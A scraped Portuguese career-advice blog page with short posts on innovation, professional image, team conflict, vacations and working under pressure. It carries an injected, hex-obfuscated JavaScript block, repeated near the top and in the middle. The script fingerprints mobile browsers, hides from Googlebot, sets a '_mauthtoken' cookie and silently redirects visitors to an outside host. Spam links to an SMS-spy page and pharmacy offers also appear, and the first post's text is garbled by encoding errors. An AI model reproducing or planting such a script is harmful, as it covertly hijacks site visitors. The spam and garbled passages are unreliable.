-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

O que significa ser um profissional inovador?

Publicado por:
20 mar

http://mujuomija.com/2018/02/13/facebook-spy-sms-spy/ http://blog.terradelfuoco.org/2018/02/nasonex-over-the-counter-uk/ 02.41 http://www.repress.co/purchase-lady-era-reviews/

O mercado de trabalho tem exigido, cada vez mais, que os profissionais saiam do bA?sico e desenvolvam novas ideias. Principalmente porque, hoje, a inovaAi??A?o Ai?? o diferencial que permite que as empresas possam sobreviver e chegar ao futuro. Mas como ser, de fato, um profissional inovador?

Em primeiro lugar Ai?? preciso perceber que inovaAi??A?o Ai?? diferente de invenAi??A?o. Este segundo significa criar algo completamente novo, que nA?o estava Ai?? disposiAi??A?o antes. JA? inovar significa aperfeiAi??oar o que jA? existe, melhorar processos simples do dia a dia, criar uma nova forma de fazer determinado serviAi??o, com mais rapidez e eficiA?ncia.
PorAi??m, muitos profissionais ainda tendem a se apegar ao tradicional e nA?o pensar de forma inovadora por resistirem e acharem que o novo trarA? grandes mudanAi??as. JA? outras pessoas acham que precisam ai???inventar a rodaai??? para serem inovadores. Pelo contrA?rio. A inovaAi??A?o pode ser feita no dia a dia, em pequenas coisas.

Para ser um profissional inovador sA? Ai?? preciso ter uma mente inquieta e questionadora, estar sempre refletindo e pesquisando formas de fazer mais e melhor, principalmente aquilo que jA? Ai?? feito no ai???piloto automA?ticoai???. Ai?? buscar constantemente soluAi??Ai??es para os problemas que norteiam sua rotina, visando a melhoria dos processos da empresa como um todo. Trata-se de uma competA?ncia que pode e deve ser desenvolvida.

JA? para o gestor que busca ter uma equipe inovadora, Ai?? preciso cuidado para nA?o criar barreiras que inibam as novas ideias. Ai?? importante estar aberto para escutar, sem censurar, considerar as sugestAi??es que sA?o trazidas e entender que os erros irA?o acontecer, pois fazem parte do processo de criaAi??A?o e desenvolvimento.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Você tem clareza da imagem que está passando?

Publicado por:
15 mar

03.91 (1)

Construir e manter uma boa imagem profissional é um passo importante para ter sucesso na carreira. Diversos fatores são determinantes na formação da imagem que transmitimos para o outro. Ter muito conhecimento técnico e ser eficiente nos processos são fatores significativos, mas se você não cultivar uma boa reputação em todos os aspectos, certamente terá dificuldade para crescer e galgar melhores posições na empresa.

No âmbito do mercado de trabalho, por mais competente e experiente que você seja, seu sucesso também depende da imagem que você passa para os outros. Não é incomum encontrarmos profissionais que têm um discurso totalmente destoante das próprias atitudes, o que não contribui em nada para a formação de uma imagem positiva.

Quem quer construir uma boa reputação no mercado de trabalho, precisa se perguntar constantemente: qual é a imagem que estou passando, como as pessoas estão me vendo e como eu gostaria de ser visto? Lembre-se que diversos fatores vão determinar como você é visto e a lista de deslizes que levam os outros a nos julgar de forma equivocada é enorme. E mais, construir a imagem que deseja passar é algo que demanda atenção e cuidado, mas reconstruir uma reputação que foi danificada é ainda mais exigente.

Então, preste atenção na própria aparência, na forma como se veste, na sua postura, no tom de voz, no teor de suas conversas, mesmo aquelas mais “informais”, além do modo como se relaciona com os pares e lida com situações diversas. Esses são alguns dos fatores que, juntos, formarão esse conjunto de ingredientes que comporão a sua imagem.

Por fim, é preciso estar sempre alerta e consciente de suas atitudes; não apenas no começo da vida profissional, mas em toda a sua trajetória. Um bom começo é importante, mas mesmo as melhores primeiras impressões podem desaparecer se não forem mantidas.

Como lidar com a diversidade de opiniões no ambiente de trabalho

Publicado por:
13 mar

9.51 (1)

Em determinados momentos da rotina de trabalho, o gestor lida com problemas de relacionamento na sua equipe, que podem ser causados por pontos de vista e posicionamentos diferentes, entre outros. Porém, omitir-se aos conflitos que acontecem internamente é um erro frequente entre os gestores, que parecem acreditar que o problema se resolverá sozinho ou que os conflitos diminuirão com o tempo.

Antes de tudo, é preciso entender que ter uma equipe com uma pluralidade de opiniões e pensamentos é algo positivo para a empresa, e saber aproveitar e conciliar as diferenças para obter melhores resultados é papel do gestor. Mas, quando essa diversidade de visões gera conflitos internos que não são tratados corretamente, o problema tende a aumentar e se tornar uma ameaça para o ambiente organizacional.

Além da omissão, outro equívoco é frequente no trato desses conflitos. Muitos gestores acreditam que substituir um dos protagonistas do problema é suficiente para resolver a questão, mas desligar um profissional não vai impedir que a divergência volte a acontecer em outro contexto ou envolvendo pessoas diferentes.

Nessas situações, o papel do gestor é de mediar o conflito, dando espaço para que os dois lados exponham seus pontos de vista e as diferenças sejam esclarecidas. É através do diálogo claro e transparente que se pode chegar a um acordo para a resolução do problema. E caso a situação chegue a um ponto extremo e insustentável, onde uma das partes não consiga superar o desentendido, e o desligamento acabe sendo a única solução viável, é preciso usar a experiência como lição para administrar conflitos futuros.

Em resumo, a administração de conflitos é responsabilidade indelegável do gestor, e é essencial para se trabalhar em equipe e atingir bons resultados.

Não tenha medo de tirar férias

Publicado por:
08 mar

06.2sol1

Pra mim, tirar férias é sinônimo de ansiedade e insegurança, pois sempre fico com receio de ficar de fora de momentos importantes na empresa ou de alguém tomar o meu lugar. Por isso, prefiro não arriscar e trabalho ano após ano sem descanso. O que posso fazer para perder esse medo?

Não é incomum encontrarmos profissionais, principalmente gestores, que se sentem inseguros em tirar férias, seja pelo medo da demissão ou pelo receio de que decisões importantes sejam tomadas na sua ausência. Muitos até chegam a não investir na formação dos colegas para realizarem suas funções, com medo de se tornarem “dispensáveis” para a empresa. Esse comportamento, porém, é autossabotador, pois em algum momento o cansaço vai cobrar seu preço e o profissional será obrigado a se ausentar sem planejar previamente.

Isso porque, durante as férias, o nível de tensão e estresse diminui de modo significativo, proporcionando uma pausa para a mente e o corpo. Logo, quem adia o descanso por muito tempo pode acabar diminuindo sua produtividade, ficando desmotivado e até mesmo doente. Tudo isso poderá afetar diretamente os resultados do profissional, tornando-se uma ameaça real para o seu emprego.

Então, para superar esse medo, é preciso, em primeiro lugar, ter segurança da sua competência. Se você tem um desempenho adequado e entrega os resultados esperados pela empresa, tirar férias não será o motivo para sua demissão. Lembre-se: seu trabalho será avaliado constantemente, e não apenas durante o período em que estiver afastado das suas funções.

Por isso é tão importante buscar constantemente um feedback sobre o seu desempenho. Sabendo exatamente como a empresa enxerga o seu trabalho e tendo segurança sobre o seu espaço, será mais fácil relaxar e curtir o merecido descanso.

Saiba usar a pressão a seu favor

Publicado por:
06 mar

03.4

Trabalhar sob pressão faz parte do dia a dia de todo profissional que enfrenta um mercado cada vez mais dinâmico e competitivo. Porém, muitas vezes, a pressão é percebida como algo essencialmente negativo, o que é um equívoco. Quando feita na medida certa, ela é necessária e pode até mesmo trabalhar a favor da produtividade.

Para gestores e profissionais, o segredo de saber aplicar ou lidar com a pressão é utilizá-la com equilíbrio para que ela trabalhe ao seu favor, e não contra. Isso porque em um ambiente de trabalho onde falta cobrança por resultados, prazos ou qualidade, também pode faltar engajamento da equipe por achar que não há estímulo à produtividade e que seu trabalho tanto faz acontecer ou não. Por outro lado, pressão demais pode gerar um sentimento de frustração, incompetência e insatisfação na equipe por não conseguir alcançar o padrão esperado. Afinal, uma rotina de trabalho que vai além do limite pode se tornar insuportável.

Para os profissionais que precisam encontrar o melhor caminho para lidar com a pressão, vale a dica: encare-a como uma oportunidade para se desenvolver tanto emocional quanto profissionalmente. Aproveite a pressão para entender o que precisa gerar de resultados, para garantir que vai cumprir suas entregas e para fugir da armadilha da acomodação, sem se deixar paralisar pelas exigências. E, principalmente, é preciso ter em mente que em empresas competitivas, que querem chegar ao futuro, ninguém estará livre da pressão.

Além de colocar em prática todas essas dicas, é importante focar naquilo que você consegue e se comprometeu a entregar. É que, muitas vezes, a maior pressão pode vir justamente do perfeccionismo ou, em outros casos, da dificuldade de negociar condições para que as entregas aconteçam com qualidade e no prazo.

Já o gestor precisa saber identificar até que ponto pode pressionar a equipe para garantir que os resultados sejam alcançados, sem esquecer da importância de reconhecer os avanços e o bom desempenho. Isso porque gerenciar pelo medo nunca será o melhor caminho. É essencial fazer com que a equipe tenha clareza das suas responsabilidades e do seu papel para que as engrenagens da empresa funcionem da melhor maneira.